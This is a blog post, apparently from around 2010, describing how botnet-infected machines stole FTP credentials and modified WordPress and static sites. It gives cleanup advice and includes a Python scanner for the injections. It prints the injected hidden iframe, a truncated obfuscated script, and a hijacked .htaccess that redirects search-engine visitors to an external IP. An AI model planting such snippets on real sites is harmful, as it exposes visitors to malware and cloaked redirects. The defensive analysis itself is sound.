Wordpress/Website Security Exploits


I have recently seen several websites that I maintain, as well as several that I don't maintain, hacked by some kind of botnet. It has been a really good learning experience, to say the least.

Most of the hacked websites were running Wordpress, so my first thought was that it was some kind of security exploit in Wordpress. Then I was asked to investigate a few static HTML or PHP driven websites without Wordpress installations. All of the hacks were very similar: the index.php, index.html, and .htaccess files had been modified. In the index.php and index.html files, JavaScript and iframe code had been appended to the end of the file that would try to install different variants of badware/malware on unsuspecting visitors. I even saw a file where part of the original code had been stripped out and replaced with the malicious JavaScript and iframe browser exploits, which completely broke the file (luckily we had a backup of the now broken file and were able to get the site working again).

The funny thing is that some of these exploits were done sloppily and actually exposed the malicious code that was appended to the end of the file. The malicious code had been placed at the end of the file right after the </html> tag, but with the opening < of the injected tag missing, so the browser rendered it as text instead of executing it.

Here is how the code looked:

</html>iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

or

</html>script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){... (which would then display the rest of the injected HTML as visible text)

Instead of:

</html><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>

or

</html><script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){...

After I removed the infected code from the files, the attackers went after the .htaccess files of some of the websites, downloading the file, deleting it and re-uploading a new version with redirects (sometimes 2-3 times a day). The effect is that if someone searched on Google (or most of its competitors) and the website came up for the searched term, the unsuspecting user would be redirected to a porn website or a malicious website serving up viruses, badware, etc. Visitors who typed the address directly saw nothing wrong, which is why these redirects often go unnoticed by the site owner.

Example of a hacked .htaccess file (only visitors arriving from a search engine, identified by the Referer header, are redirected):

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

Image of .htaccess Attacks


Upon investigation, I found out that the hacks may have come from some kind of spyware or trojan installed on a client's or a coworker's computer. The spyware looks for FTP user names and passwords stored on the computer it has infected. It then logs into your server via FTP (from several different dynamic IP addresses), downloads a file (usually the .htaccess and index.php files), adds malicious code to it, deletes the old file on your server, and uploads the new one. The entire process of downloading, deleting, and re-uploading takes around 2 seconds, so the FTP log shows a legitimate login followed by a very short session, which is the main clue to look for.
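As an added defender's example (not code from the original post), the following Python scan flags the two artifacts described above: content appended after </html> in index files (including the sloppy variant that lost its leading <), and .htaccess rules that redirect search-engine referrers to an off-site URL. The sample files are constructed for the example and the redirect address is a placeholder, not the one from the attack.

```python
import re
from typing import List, Optional

# Constructed samples modelled on the injections described in the post.
CLEAN_HTML = "<html><body>hello</body></html>\n"
INJECTED_HTML = (CLEAN_HTML.strip() + "<iframe src='http://url/' width='1' "
                 "height='1' style='visibility: hidden;'></iframe>")
SLOPPY_HTML = CLEAN_HTML.strip() + "script>function c1029(x){...}</script>"
CLEAN_HTACCESS = "RewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n"
HIJACKED_HTACCESS = ("RewriteEngine On\n"
                     "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
                     "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\n"
                     "RewriteRule .* http://203.0.113.5/in.html?s=x [R,L]\n")

SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")


def trailing_injection(html: str) -> Optional[str]:
    """Return non-whitespace content after the last </html> tag, or None.

    A clean page ends at </html>; both the hidden iframe/script payload and
    the sloppy variant missing its '<' show up as a trailing remainder."""
    idx = html.lower().rfind("</html>")
    if idx < 0:
        return None
    tail = html[idx + len("</html>"):].strip()
    return tail or None


def referrer_hijack(htaccess: str) -> List[str]:
    """Return RewriteRule lines that redirect ([R]) to an absolute off-site
    URL while the file also conditions on search-engine referrers."""
    lines = htaccess.splitlines()
    keyed_on_search = any(
        re.match(r"\s*RewriteCond\s+%\{HTTP_REFERER\}", ln, re.I)
        and any(se in ln.lower() for se in SEARCH_ENGINES)
        for ln in lines)
    if not keyed_on_search:
        return []
    hits = []
    for ln in lines:
        m = re.match(r"\s*RewriteRule\s+\S+\s+(https?://\S+)\s*\[([^\]]*)\]",
                     ln, re.I)
        if m:
            flags = [f.strip().upper() for f in m.group(2).split(",")]
            if any(f == "R" or f.startswith("R=") for f in flags):
                hits.append(ln.strip())
    return hits


if __name__ == "__main__":
    for name, doc in (("clean", CLEAN_HTML), ("iframe", INJECTED_HTML),
                      ("sloppy", SLOPPY_HTML)):
        print(name, "->", trailing_injection(doc))
    print("htaccess ->", referrer_hijack(HIJACKED_HTACCESS))
```

Run the two checks over every index.php, index.html and .htaccess under the web root on a schedule; a hit on a file whose modification time coincides with a short FTP session is the pattern described above.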

To help prevent these attacks, scan your PC with an updated AV and malware scanner in safe mode. From my experience with malware of this nature, the user account passwords are compromised through viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs on that computer. In order to protect against future attacks, you will need to run full virus and malware scans on your computers to ensure that they are clean, and then change the FTP passwords, since the old ones are already in the attackers' hands. I recommend using multiple scanners, as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. Microsoft recently released an AV/malware package at: http://www.microsoft.com/security_essentials

More info:

http://www.websitesforsaleworld.co.uk/blog/2010/02/securing-your-wordpress-blog-from-attack/

http://www.techjaws.com/new-php-exploit-on-the-loose/

http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/

http://cyberinsecure.com/researchers-discover-new-cross-browser-exploit-that-affects-all-major-desktop-platforms/

http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/
